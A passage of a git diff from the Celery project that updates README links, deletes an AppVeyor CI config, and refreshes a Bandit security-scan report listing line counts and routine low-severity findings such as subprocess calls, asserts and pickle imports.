+:``celery[amqp]``:
+ for using the RabbitMQ amqp python library.
:``celery[redis]``:
for using Redis as a message transport or as a result backend.
@@ -417,10 +422,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
-network.
+Come chat with us on IRC. The **#celery** channel is located at the
+`Libera Chat`_ network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://libera.chat/
.. _bug-tracker:
@@ -498,9 +503,9 @@ file in the top distribution directory for the full license text.
.. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround
-.. |build-status| image:: https://secure.travis-ci.org/celery/celery.png?branch=master
+.. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg
:alt: Build status
- :target: https://travis-ci.org/celery/celery
+ :target: https://github.com/celery/celery/actions/workflows/python-package.yml
.. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master
:target: https://codecov.io/github/celery/celery?branch=master
diff --git a/appveyor.yml b/appveyor.yml
deleted file mode 100644
index 666932d9540..00000000000
--- a/appveyor.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-environment:
-
- global:
- # SDK v7.0 MSVC Express 2008's SetEnv.cmd script will fail if the
- # /E:ON and /V:ON options are not enabled in the batch script intepreter
- # See: https://stackoverflow.com/a/13751649/163740
- WITH_COMPILER: "cmd /E:ON /V:ON /C .\\extra\\appveyor\\run_with_compiler.cmd"
-
- matrix:
-
- # Pre-installed Python versions, which Appveyor may upgrade to
- # a later point release.
- # See: https://www.appveyor.com/docs/installed-software#python
-
- - PYTHON: "C:\\Python36-x64"
- PYTHON_VERSION: "3.6.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.6-unit"
-
- - PYTHON: "C:\\Python37-x64"
- PYTHON_VERSION: "3.7.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.7-unit"
-
- - PYTHON: "C:\\Python38-x64"
- PYTHON_VERSION: "3.8.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.8-unit"
-
-
-init:
- - "ECHO %PYTHON% %PYTHON_VERSION% %PYTHON_ARCH%"
-
-install:
- - "powershell extra\\appveyor\\install.ps1"
- - "%PYTHON%/python -m pip install -U pip setuptools tox"
- - "%PYTHON%/Scripts/pip.exe install -U eventlet"
- - "%PYTHON%/Scripts/pip.exe install -U -r requirements/extras/thread.txt"
-
-build: off
-
-test_script:
- - "%WITH_COMPILER% %PYTHON%/Scripts/tox -v -- -v"
-
-after_test:
- - "%WITH_COMPILER% %PYTHON%/python setup.py bdist_wheel"
-
-artifacts:
- - path: dist\*
-
-cache:
- - '%LOCALAPPDATA%\pip\Cache'
-
-#on_success:
-# - TODO: upload the content of dist/*.whl to a public wheelhouse
diff --git a/bandit.json b/bandit.json
index 95a9201f312..fa207a9c734 100644
--- a/bandit.json
+++ b/bandit.json
@@ -1,17 +1,17 @@
{
"errors": [],
- "generated_at": "2020-08-06T14:09:58Z",
+ "generated_at": "2021-11-08T00:55:15Z",
"metrics": {
"_totals": {
- "CONFIDENCE.HIGH": 38.0,
+ "CONFIDENCE.HIGH": 40.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 2.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 38.0,
+ "SEVERITY.LOW": 40.0,
"SEVERITY.MEDIUM": 2.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 29309,
+ "loc": 29546,
"nosec": 0
},
"celery/__init__.py": {
@@ -23,7 +23,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 129,
+ "loc": 126,
"nosec": 0
},
"celery/__main__.py": {
@@ -35,7 +35,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 9,
+ "loc": 12,
"nosec": 0
},
"celery/_state.py": {
@@ -71,7 +71,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 528,
+ "loc": 503,
"nosec": 0
},
"celery/app/annotations.py": {
@@ -95,7 +95,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 43,
+ "loc": 50,
"nosec": 0
},
"celery/app/backends.py": {
@@ -119,7 +119,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 964,
+ "loc": 1028,
"nosec": 0
},
"celery/app/builtins.py": {
@@ -143,7 +143,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 383,
+ "loc": 607,
"nosec": 0
},
"celery/app/defaults.py": {
@@ -155,7 +155,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 365,
+ "loc": 361,
"nosec": 0
},
"celery/app/events.py": {
@@ -179,7 +179,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 197,
+ "loc": 198,
"nosec": 0
},
"celery/app/registry.py": {
@@ -203,7 +203,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 110,
+ "loc": 107,
"nosec": 0
},
"celery/app/task.py": {
@@ -215,7 +215,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 740,
+ "loc": 779,
"nosec": 0
},
"celery/app/trace.py": {
@@ -227,7 +227,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 535,
+ "loc": 560,
"nosec": 0
},
"celery/app/utils.py": {
@@ -239,7 +239,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 315,
"nosec": 0
},
"celery/apps/__init__.py": {
@@ -275,7 +275,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 409,
+ "loc": 426,
"nosec": 0
},
"celery/apps/worker.py": {
@@ -287,7 +287,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 291,
+ "loc": 304,
"nosec": 0
},
"celery/backends/__init__.py": {
@@ -299,19 +299,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 17,
- "nosec": 0
- },
- "celery/backends/amqp.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 265,
+ "loc": 1,
"nosec": 0
},
"celery/backends/arangodb.py": {
@@ -323,7 +311,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 199,
+ "loc": 201,
"nosec": 0
},
"celery/backends/asynchronous.py": {
@@ -347,7 +335,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 107,
+ "loc": 126,
"nosec": 0
},
"celery/backends/base.py": {
@@ -359,7 +347,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 773,
+ "loc": 809,
"nosec": 0
},
"celery/backends/cache.py": {
@@ -371,7 +359,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 117,
+ "loc": 118,
"nosec": 0
},
"celery/backends/cassandra.py": {
@@ -383,7 +371,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 178,
+ "loc": 174,
"nosec": 0
},
"celery/backends/consul.py": {
@@ -395,7 +383,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 74,
+ "loc": 79,
"nosec": 0
},
"celery/backends/cosmosdbsql.py": {
@@ -419,7 +407,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 85,
+ "loc": 79,
"nosec": 0
},
"celery/backends/couchdb.py": {
@@ -431,7 +419,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 77,
"nosec": 0
},
"celery/backends/database/__init__.py": {
@@ -467,7 +455,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 47,
+ "loc": 68,
"nosec": 0
},
"celery/backends/dynamodb.py": {
@@ -503,7 +491,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 89,
"nosec": 0
},
"celery/backends/mongodb.py": {
@@ -515,7 +503,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 241,
+ "loc": 243,
"nosec": 0
},
"celery/backends/redis.py": {
@@ -527,19 +515,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 448,
- "nosec": 0
- },
- "celery/backends/riak.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 105,
+ "loc": 499,
"nosec": 0
},
"celery/backends/rpc.py": {
@@ -563,19 +539,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 65,
+ "loc": 66,
"nosec": 0
},
"celery/beat.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 553,
+ "loc": 567,
"nosec": 0
},
"celery/bin/__init__.py": {
@@ -599,7 +575,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 268,
+ "loc": 274,
"nosec": 0
},
"celery/bin/base.py": {
@@ -611,7 +587,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 180,
+ "loc": 219,
"nosec": 0
},
"celery/bin/beat.py": {
@@ -623,7 +599,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 58,
+ "loc": 63,
"nosec": 0
},
"celery/bin/call.py": {
@@ -635,7 +611,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 66,
+ "loc": 69,
"nosec": 0
},
"celery/bin/celery.py": {
@@ -647,7 +623,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 127,
+ "loc": 176,
"nosec": 0
},
"celery/bin/control.py": {
@@ -659,7 +635,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 164,
+ "loc": 181,
"nosec": 0
},
"celery/bin/events.py": {
@@ -671,7 +647,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 76,
+ "loc": 79,
"nosec": 0
},
"celery/bin/graph.py": {
@@ -683,7 +659,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 157,
+ "loc": 162,
"nosec": 0
},
"celery/bin/list.py": {
@@ -695,7 +671,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 25,
+ "loc": 28,
"nosec": 0
},
"celery/bin/logtool.py": {
@@ -707,7 +683,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 125,
"nosec": 0
},
"celery/bin/migrate.py": {
@@ -719,7 +695,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 54,
+ "loc": 57,
"nosec": 0
},
"celery/bin/multi.py": {
@@ -731,7 +707,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 372,
+ "loc": 375,
"nosec": 0
},
"celery/bin/purge.py": {
@@ -743,7 +719,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 55,
+ "loc": 60,
"nosec": 0
},
"celery/bin/result.py": {
@@ -755,7 +731,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 22,
+ "loc": 25,
"nosec": 0
},
"celery/bin/shell.py": {
@@ -767,7 +743,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 143,
+ "loc": 144,
"nosec": 0
},
"celery/bin/upgrade.py": {
@@ -779,7 +755,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 69,
+ "loc": 74,
"nosec": 0
},
"celery/bin/worker.py": {
@@ -791,7 +767,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 306,
"nosec": 0
},
"celery/bootsteps.py": {
@@ -815,7 +791,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 1113,
+ "loc": 1143,
"nosec": 0
},
"celery/concurrency/__init__.py": {
@@ -827,7 +803,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 19,
+ "loc": 22,
"nosec": 0
},
"celery/concurrency/asynpool.py": {
@@ -863,7 +839,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 114,
+ "loc": 145,
"nosec": 0
},
"celery/concurrency/gevent.py": {
@@ -887,7 +863,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 131,
+ "loc": 132,
"nosec": 0
},
"celery/concurrency/solo.py": {
@@ -911,7 +887,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 33,
+ "loc": 30,
"nosec": 0
},
"celery/contrib/__init__.py": {
@@ -959,7 +935,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 146,
+ "loc": 153,
"nosec": 0
},
"celery/contrib/rdb.py": {
@@ -1019,7 +995,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 175,
+ "loc": 176,
"nosec": 0
},
"celery/contrib/testing/mocks.py": {
@@ -1055,7 +1031,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 130,
+ "loc": 141,
"nosec": 0
},
"celery/events/__init__.py": {
@@ -1139,7 +1115,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 87,
+ "loc": 88,
"nosec": 0
},
"celery/events/state.py": {
@@ -1151,7 +1127,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 569,
+ "loc": 570,
"nosec": 0
},
"celery/exceptions.py": {
@@ -1163,19 +1139,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 186,
- "nosec": 0
- },
- "celery/five.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 4,
+ "loc": 196,
"nosec": 0
},
"celery/fixups/__init__.py": {
@@ -1235,7 +1199,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 202,
+ "loc": 204,
"nosec": 0
},
"celery/loaders/default.py": {
@@ -1259,7 +1223,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 426,
+ "loc": 404,
"nosec": 0
},
"celery/platforms.py": {
@@ -1271,7 +1235,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 623,
+ "loc": 631,
"nosec": 0
},
"celery/result.py": {
@@ -1283,7 +1247,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 866,
+ "loc": 843,
"nosec": 0
},
"celery/schedules.py": {
@@ -1382,30 +1346,6 @@
"loc": 95,
"nosec": 0
},
- "celery/task/__init__.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 39,
- "nosec": 0
- },
- "celery/task/base.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 184,
- "nosec": 0
- },
"celery/utils/__init__.py": {
"CONFIDENCE.HIGH": 0.0,
"CONFIDENCE.LOW": 0.0,
@@ -1439,7 +1379,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 611,
+ "loc": 595,
"nosec": 0
},
"celery/utils/debug.py": {
@@ -1490,18 +1430,6 @@
"loc": 262,
"nosec": 0
},
- "celery/utils/encoding.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 5,
- "nosec": 0
- },
"celery/utils/functional.py": {
"CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
@@ -1511,7 +1439,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 261,
+ "loc": 290,
"nosec": 0
},
"celery/utils/graph.py": {
@@ -1535,7 +1463,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 122,
+ "loc": 115,
"nosec": 0
},
"celery/utils/iso8601.py": {
@@ -1559,7 +1487,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 215,
"nosec": 0
},
"celery/utils/nodenames.py": {
@@ -1595,7 +1523,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 188,
+ "loc": 190,
"nosec": 0
},
"celery/utils/serialization.py": {
@@ -1607,7 +1535,7 @@
"SEVERITY.LOW": 4.0,
"SEVERITY.MEDIUM": 1.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 210,
+ "loc": 209,
"nosec": 0
},
"celery/utils/static/__init__.py": {
@@ -1655,7 +1583,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 135,
+ "loc": 136,
"nosec": 0
},
"celery/utils/threads.py": {
@@ -1775,7 +1703,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 470,
+ "loc": 493,
"nosec": 0
},
"celery/worker/consumer/control.py": {
@@ -1859,7 +1787,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 423,
+ "loc": 424,
"nosec": 0
},
"celery/worker/heartbeat.py": {
@@ -1883,7 +1811,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 79,
+ "loc": 92,
"nosec": 0
},
"celery/worker/pidbox.py": {
@@ -1907,19 +1835,19 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 536,
+ "loc": 578,
"nosec": 0
},
"celery/worker/state.py": {
- "CONFIDENCE.HIGH": 0.0,
+ "CONFIDENCE.HIGH": 1.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 0.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
+ "SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 200,
+ "loc": 208,
"nosec": 0
},
"celery/worker/strategy.py": {
@@ -1931,7 +1859,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 166,
+ "loc": 175,
"nosec": 0
},
"celery/worker/worker.py": {
@@ -1963,353 +1891,369 @@
"test_name": "blacklist"
},
{
- "code": "196 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n197 pipe = Popen(argstr, env=env)\n198 return self.handle_process_exit(\n",
+ "code": "216 maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env)\n217 pipe = Popen(argstr, env=env)\n218 return self.handle_process_exit(\n",
"filename": "celery/apps/multi.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "subprocess call - check for execution of untrusted input.",
- "line_number": 197,
+ "line_number": 217,
"line_range": [
- 197
+ 217
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b603_subprocess_without_shell_equals_true.html",
"test_id": "B603",
"test_name": "subprocess_without_shell_equals_true"
},
{
- "code": "322 ])\n323 os.execv(sys.executable, [sys.executable] + sys.argv)\n324 \n",
+ "code": "341 ])\n342 os.execv(sys.executable, [sys.executable] + sys.argv)\n343 \n",
"filename": "celery/apps/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 323,
+ "line_number": 342,
"line_range": [
- 323
+ 342
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "74 self.set(key, b'test value')\n75 assert self.get(key) == b'test value'\n76 self.delete(key)\n",
+ "code": "72 self.set(key, b'test value')\n73 assert self.get(key) == b'test value'\n74 self.delete(key)\n",
"filename": "celery/backends/filesystem.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 75,
+ "line_number": 73,
"line_range": [
- 75
+ 73
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "89 path = executable\n90 os.execv(path, [path] + argv)\n91 except Exception: # pylint: disable=broad-except\n",
+ "code": "6 import os\n7 import shelve\n8 import sys\n",
+ "filename": "celery/beat.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 7,
+ "line_range": [
+ 7
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
+ },
+ {
+ "code": "124 path = executable\n125 os.execv(path, [path] + argv)\n126 return EX_OK\n",
"filename": "celery/bin/worker.py",
"issue_confidence": "MEDIUM",
"issue_severity": "LOW",
"issue_text": "Starting a process without a shell.",
- "line_number": 90,
+ "line_number": 125,
"line_range": [
- 90
+ 125
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b606_start_process_with_no_shell.html",
"test_id": "B606",
"test_name": "start_process_with_no_shell"
},
{
- "code": "23 from numbers import Integral\n24 from pickle import HIGHEST_PROTOCOL\n25 from time import sleep\n",
+ "code": "22 from numbers import Integral\n23 from pickle import HIGHEST_PROTOCOL\n24 from struct import pack, unpack, unpack_from\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with HIGHEST_PROTOCOL module.",
- "line_number": 24,
+ "line_number": 23,
"line_range": [
- 24
+ 23
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "613 proc in waiting_to_start):\n614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n",
+ "code": "607 proc in waiting_to_start):\n608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 614,
+ "line_number": 608,
"line_range": [
- 614
+ 608
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n",
+ "code": "608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 615,
+ "line_number": 609,
"line_range": [
- 615
+ 609
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
